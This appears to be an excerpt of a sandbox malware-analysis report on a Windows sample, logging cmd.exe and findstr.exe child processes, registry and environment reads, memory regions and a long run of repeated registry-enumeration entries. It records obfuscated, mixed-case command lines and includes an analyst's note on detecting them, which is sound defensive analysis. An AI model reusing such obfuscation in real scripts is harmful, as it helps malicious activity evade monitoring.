Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Classes - True 1
Fn
Module (10)
Operation Module Additional Information Success Count Logfile
Load ADVAPI32.dll base_address = 0x7feff0e0000 True 1
Fn
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77b36d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x77b323d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77b28290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x77b317e0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegEnumKeyW, address_out = 0x7feff0fbf20 True 1
Fn
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-11-06 10:24:15 (UTC) True 1
Fn
Get Time type = Ticks, time = 140728 True 1
Fn
Environment (9)
Operation Additional Information Success Count Logfile
Get Environment String - True 3
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT, result_out = $P$G True 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Process #10: findstr.exe
0 0
Information Value
ID #10
File Name c:\windows\system32\findstr.exe
Command Line fiNdStr cm
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:42, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:02
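Remark No high level activity detected in monitored regions
[Analyst note: this findstr.exe shares parent PID 0xb24 and monitor start time 00:01:42 with Process #9 (the ftYpe shell), which is consistent with the two being the two ends of one pipe. The mixed-case spelling of both command names is an obfuscation marker, so detections on these command lines should match case-insensitively.]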
OS Process Information
Information Value
PID 0xb34
Parent PID 0xb24 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B38
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory r True False False -
private_0x00000000001b0000 0x001b0000 0x0022ffff Private Memory rw True False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
findstr.exe 0xff910000 0xff925fff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffdd000 0x7fffffdd000 0x7fffffdefff Private Memory rw True False False -
private_0x000007fffffdf000 0x7fffffdf000 0x7fffffdffff Private Memory rw True False False -
Process #11: cmd.exe
51 0
Information Value
ID #11
File Name c:\windows\system32\cmd.exe
Command Line C:\Windows\system32\cmd.exe /S /D /c" echO ,%*[-,% "
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:43, Reason: Child Process
Unmonitor End Time: 00:01:44, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0xb3c
Parent PID 0xb04 (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B40
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x00044fff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00041fff Pagefile Backed Memory rw True False False -
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory rw True False False -
pagefile_0x0000000000150000 0x00150000 0x00153fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory r True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory rw True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory rw True False False -
private_0x00000000001c0000 0x001c0000 0x002bffff Private Memory rw True False False -
locale.nls 0x002c0000 0x00326fff Memory Mapped File r False False False -
private_0x0000000000410000 0x00410000 0x0041ffff Private Memory rw True False False -
private_0x0000000000420000 0x00420000 0x0051ffff Private Memory rw True False False -
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory r True False False -
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory r True False False -
pagefile_0x0000000001c40000 0x01c40000 0x01f82fff Pagefile Backed Memory r True False False -
private_0x0000000001f90000 0x01f90000 0x0208ffff Private Memory rw True False False -
cmd.exe 0x4a0b0000 0x4a108fff Memory Mapped File rwx True False False -
user32.dll 0x77a20000 0x77b19fff Memory Mapped File rwx False False False -
kernel32.dll 0x77b20000 0x77c3efff Memory Mapped File rwx False False False -
ntdll.dll 0x77c40000 0x77de8fff Memory Mapped File rwx False False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory r True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory r True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory r True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory r True False False -
winbrand.dll 0x7fef59a0000 0x7fef59a7fff Memory Mapped File rwx False False False -
kernelbase.dll 0x7fefdd60000 0x7fefddcafff Memory Mapped File rwx False False False -
gdi32.dll 0x7fefdf60000 0x7fefdfc6fff Memory Mapped File rwx False False False -
imm32.dll 0x7fefed60000 0x7fefed8dfff Memory Mapped File rwx False False False -
msctf.dll 0x7feff1e0000 0x7feff2e8fff Memory Mapped File rwx False False False -
usp10.dll 0x7feff4d0000 0x7feff598fff Memory Mapped File rwx False False False -
msvcrt.dll 0x7feff5a0000 0x7feff63efff Memory Mapped File rwx False False False -
lpk.dll 0x7feff860000 0x7feff86dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x7fefff60000 0x7fefff60fff Memory Mapped File rwx False False False -
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory r True False False -
private_0x000007fffffd3000 0x7fffffd3000 0x7fffffd3fff Private Memory rw True False False -
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory rw True False False -
Host Behavior
File (12)
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Desktop type = file_attributes True 2
Fn
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Write STD_OUTPUT_HANDLE size = 1095 True 1
Fn
Data
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4a0b0000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77b20000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
